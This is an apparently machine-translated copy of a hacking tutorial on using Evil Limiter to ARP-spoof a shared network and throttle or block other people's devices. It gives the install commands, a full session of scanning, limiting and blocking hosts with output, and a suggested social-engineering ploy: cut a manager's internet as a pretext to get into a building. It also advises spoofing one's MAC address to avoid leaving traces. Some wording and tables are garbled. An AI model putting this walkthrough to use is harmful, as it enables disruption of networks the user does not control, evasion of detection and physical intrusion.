قالب وردپرس درنا توس
Home / Tips and Tricks / How to Control Network Traffic with Evil Limiter to Throttle or Disable Devices «Null Byte :: WonderHowTo

How to Control Network Traffic with Evil Limiter to Throttle or Disable Devices «Null Byte :: WonderHowTo



If you're dealing with a roommate who has limited video bandwidth with video games, or if you discover a neighbor invites you into your Wi-Fi network, you can easily regain control of your Internet access. Evil Limiter allows you to control the bitrate of a device on the same network as you, and to slow down or even stop the data transfer speed for this device completely.

In general, the average user does not have much visibility over who or what's on their network, so anyone can intervene with the password and start using bandwidth. In other situations, a roommate or family member may use the entire bandwidth unjustifiably to play video games or stream videos. Some routers have web interfaces that allow you to set restrictions for each connection. However, without the password for the router, this option may not be available.

Evil Limiter uses ARP spoofing to make devices send data to the attacking computer instead of the router, so we can forward the data to the router at any speed. The functionality of the ARP protocol allows the speed of each device to be controlled in a shared network connection. However, because ARP spoofing only works in IPv4 networks, this tool will not work in IPv6 for the time being.

Evil Limiter for Hackers

For a hacker, Evil Limiter enables easy targeting of one, several, or all devices on a network. It's easy to disconnect the Internet connection of a particular device at any time, which provides a practical excuse for a social engineering attack. If a hacker wants access to an employee-only area, he can identify the employee's device in the area he wants to be in and then limit the connection speed.

Instead of showing up unannounced, a hacker can throttle the manager's data connection while pretending to call the utility to ask if the internet connection was slow. If the manager finds that the Internet is indeed slow, the hacker simply asks for the best time to send someone to fix the problem. He gives him the excuse to enter the building and prevents the target from calling the real utility.

Need

To use Evil Limiter, you need a Linux system like Kali or Ubuntu with Python3 or higher. A big advantage of Evil Limter is that it can run in networks, even if you do not have administrator rights. However, I recommend that you make sure that you have permission to run the tool on any network in which you want to test it.

Evil The Limiter uses the ARP packet to limit the link speeds that exist on IPv4 networks but not on IPv6 networks. Because of this, IPv6 systems are not within reach of this tool, as mentioned earlier.

Step 1: Install Evil Limiter

To install Evil Limiter, only a few commands need to be executed in a terminal window, as seen below. When the installation of the required libraries is complete, Evil Limiter should be installed and ready for use.

  ~ # git clone https://github.com/bitbrute/evillimiter.git
~ # cd evillimiter
~ # sudo python3 setup.py install 

Step 2: Connecting to the Network

Now you need to connect to your destination network. You can then run Evil Limiter by typing evillimiter into a new terminal window. You should see something like below.

  ~ # evillimiter

███████╗██╗ ███████╗██╗ ██╗███╗ ██╗███╗
██╔════╝██║ ██╔════╝██║ ██║████╗ ██║████╗ ══██╗
█████╗ █████╗ ██║██║██║ ███ ███ ███ ██╗ ███╔╝
██╔══╝ ██╔══╝ ██╔╝██║██║ █ █ █ █╔══╝ █╔══██╗
███████╗ ███████╗ ██║███████╗ ███████╗██║██║ ║██║ ██║██║ █║ ███████╗██║
╚══════╝ ╚══════╝ ╚═╝╚══════╝ ╚══════╝╚═╝╚═╝ ╚═╝ ═╝ ════╝╚═╝ ════╝╚═╝
through bitbrute ~ limit devices in your network: 3
v1.1.0

OK interface: wlan0
OK Gateway IP: 192.168.5.1
OK Gateway Mac: 84: ██: ██: ██: ██: 1a
OK Netmask: 255.255.255.0

Writing help or? 

When this is displayed, Evil Limiter is installed, connected to the network and ready for use.

Step 3: View Available Commands

You can examine the functions of Evil Limiter through the menu system and checking out the available commands. To do this, enter a question mark in the terminal to call up the help page.

  (Main) >>>?

scan searches for online hosts in your network.
required to find the hosts you want to limit.

hosts lists all scanned hosts.
Contains host information, including IDs.

limit [ID1,ID2,...] [rate]      limits the bandwidth of the host (uload / dload).
Example: Limit 4 100kbit
limit 2,3,4 1gbit
limit all 200kbit

block [ID1,ID2,...] blocks the internet access of hosts.
For example: block 3.2
block everything

free [ID1,ID2,...] Host (s) unlimits / unblocks.
z. B .: free 3
free everyone

add [IP] (--mac [MAC]) adds a custom host to the host list.
Mac will be automatically resolved.
z. B .: 192.168.178.24 add
Add 192.168.1.50 --mac 1c: fc: bc: 2d: a6: 37

clear clears the terminal window. 

Step 4: Detecting Devices

As we can see above, the commands are straightforward. To find devices on the network, you only need to scan .

  (Main) >>> enter scan

100% | ██████████████████████████████ | 256/256
OK 7 hosts found. 

The scan invokes all other hosts on the network. Enter hosts to display all hosts.

  (Main) >>> hosts

"Host" ─────┐
│ ID │ IP address │ MAC address │ Host name │ Status │
├────┼──────────────┼───────────────────┼───────── ─┼────────┤
│ 0 │ 192.168.5.1 │ 84: ██: ██: ██: ██: 1a │ _gateway │ Free │
│ 1 │ 192.168.5.2 │ 0c: ██: ██: ██: ██: f5 │ │ Free │
│ 2 │ 192.168.5.4 │ 3c: ██: ██: ██: ██: 6f │ Free │
│ 3 │ 192.168.5.24 │ 60: ██: ██: ██: ██: 78 │ │ Free │
│ 4 │ 192.168.5.25 4 c4: ██: ██: ██: ██: 2b │ │ Free │
│ 5 │ 192.168.5.61 │ 8c: ██: ██: ██: ██: f5 │ Free │
│ 6 │ 192.168.5.67 │ f0: ██: ██: ██: ██: b5 │ │ Free │
└────┴──────────────┴───────────────────┴───────── ─┴─────┘ 

In my example, seven devices were found on the network, one of which is the router. Now we have a destination list that we can use to block or restrict access. So let's try it.

Step 5: Limit or Block Devices

If you want to restrict any device except the router, you can list them one after the other by issuing limit . You must also specify the speed to which you want to restrict it. In my case I go with 200kbit as border speed.

You can select anything with the command limit all but you want to leave the router alone. Instead, issue the command limit 1,2,3,4,5,6 to restrict these specific devices. The number of devices you list depends on how many you have found.

  (Main) >>> limit 1,2,3,4,5,6 200kbit

OK 192.168.5.2 is limited to 200 kbit.
OK 192.168.5.4 is limited to 200 kbit.
OK 192.168.5.24 limited to 200 kbit.
OK 192.168.5.25 limited to 200 kbit.
OK 192.168.5.61 limited to 200 kbit.
OK 192.168.5.67 limited to 200 kbit. 

Now that we have limited some devices, we can also select all devices that should be blocked for full access to the network. I've found that Evil Limiter can sometimes be stubborn while restricting connections. The result is that devices are so severely limited that they can be blocked as well.

To block a device, enter the block and then the number of a device that you want to prevent from receiving data over the network.

  (Main) >>> Block 3

OK 192.168.5.24 blocked. 

Try to execute hosts a second time. Most of the network should be blocked or limited.

  (Main) >>> Hosts

"Host" ─────┐
│ ID │ IP address │ MAC address │ Host name │ Status │
├────┼──────────────┼───────────────────┼───────── ─┼─────────┤
│ 0 │ 192.168.5.1 │ 84: ██: ██: ██: ██: 1a │ _gateway │ Free │
│ 1 │ 192.168.5.2 │ 0c: ██: ██: ██: ██: f5 │ │ Limited │
│ 2 │ 192.168.5.4 │ 3c: ██: ██: ██: ██: 6f │ │ Limited │
│ 3 │ 192.168.5.24 │ 60: ██: ██: ██: ██: 78 │ │ Blocked │
│ 4 │ 192.168.5.25 │ c4: ██: ██: ██: ██: 2b │ │ Limited │
│ 5 │ 192.168.5.61 c 8c: ██: ██: ██: ██: f5 │ │ Limited │
│ 6 │ 192.168.5.67 │ f0: ██: ██: ██: ██: b5 │ │ Limited │
└────┴──────────────┴───────────────────┴───────── ─┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Luckily, that's easy. You can either restore devices one at a time or run  free all  to undo restrictions on network devices. 

  (Main) >>> free all

OK 192.168.5.2 released.
OK 192.168.5.4 released.
OK 192.168.5.24 released.
OK 192.168.5.25 released.
OK 192.168.5.61 released.
OK 192.168.5.67 released. 

Run hosts a third time, and network access should be back to normal for all devices.

  (Main) >>> Hosts

"Host" ─────┐
│ ID │ IP address │ MAC address │ Host name │ Status │
├────┼──────────────┼───────────────────┼───────── ─┼────────┤
│ 0 │ 192.168.5.1 │ 84: ██: ██: ██: ██: 1a │ _gateway │ Free │
│ 1 │ 192.168.5.2 │ 0c: ██: ██: ██: ██: f5 │ │ Free │
│ 2 │ 192.168.5.4 │ 3c: ██: ██: ██: ██: 6f │ Free │
│ 3 │ 192.168.5.24 │ 60: ██: ██: ██: ██: 78 │ │ Free │
│ 4 │ 192.168.5.25 4 c4: ██: ██: ██: ██: 2b │ │ Free │
│ 5 │ 192.168.5.61 │ 8c: ██: ██: ██: ██: f5 │ Free │
│ 6 │ 192.168.5.67 │ f0: ██: ██: ██: ██: b5 │ │ Free │
└────┴──────────────┴───────────────────┴───────── ─┴─────┘ 

Evil Limiter is effective but aggressive

In my tests with Evil Limiter, I found that it was a very effective, if sometimes overbearing, tool. Occasionally my attempts to restrict a goal completely blocked it. Therefore, test the effectiveness of this tool before using it in any important place.

When using Evil Limiter, be aware that ARP spoofing exposes your MAC address. So if you use this tool on a network, everyone will be notified that your MAC address is the router. This leaves your MAC address in the ARP cache of each computer you are targeting. Therefore, make sure that you have faked your MAC address before using this tool if you do not want to leave the fingerprints of your computer on the entire network.

I hope you liked this guide to using Evil Limiter! If you have questions about this ARP spoofing tutorial, write a comment below and call me on Twitter @KodyKinzie .

Do not miss: Get the Wi-Fi of another password without cracking with Wifiphisher

Cover photo and screenshots of Kody / Null Byte




Source link